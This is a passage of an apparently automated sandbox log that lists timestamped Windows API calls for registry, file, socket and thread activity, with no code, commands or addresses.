"RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryInfoKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": 
"2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 
17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "NtQueryValueKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": 
"RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtReadFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtCreateFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtReadFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtReadFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": 
"FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,353", "api": "NtFreeVirtualMemory"}, 
{"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryInfoKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, 
{"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": 
"registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "NtQueryValueKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", 
"timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtReadFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "NtReadFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, 
{"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,353", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,353", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, 
{"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,363", "api": "NtFreeVirtualMemory"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,363", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, 
{"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegDeleteValueA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegDeleteValueA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegDeleteValueA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": 
"RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,363", "api": "RegQueryValueExA"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,363", "api": "NtQueryInformationFile"}, {"category": "network", "timestamp": "2016-02-16 17:41:35,363", "api": "getaddrinfo"}, {"category": "network", "timestamp": "2016-02-16 17:41:35,363", "api": "getaddrinfo"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,363", "api": "socket"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,363", "api": "bind"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,363", "api": "NtDeviceIoControlFile"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,513", "api": "connect"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,513", "api": "setsockopt"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,513", "api": "setsockopt"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,513", "api": "setsockopt"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,513", "api": "send"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,683", "api": "WSARecv"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,683", "api": "ioctlsocket"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,683", "api": "WSARecv"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,683", "api": "ioctlsocket"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,683", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,683", "api": "RegSetValueExA"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:35,683", "api": "NtQueryInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,683", "api": "RegQueryValueExA"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,683", "api": "NtQueryInformationFile"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,683", "api": "WSARecv"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,683", "api": "ioctlsocket"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,693", "api": "send"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,974", "api": "WSARecv"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,974", "api": "ioctlsocket"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,974", "api": "WSARecv"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,974", "api": "ioctlsocket"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,974", "api": "RegSetValueExA"}, {"category": "threading", "timestamp": "2016-02-16 17:41:35,974", "api": "CreateThread"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,984", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": 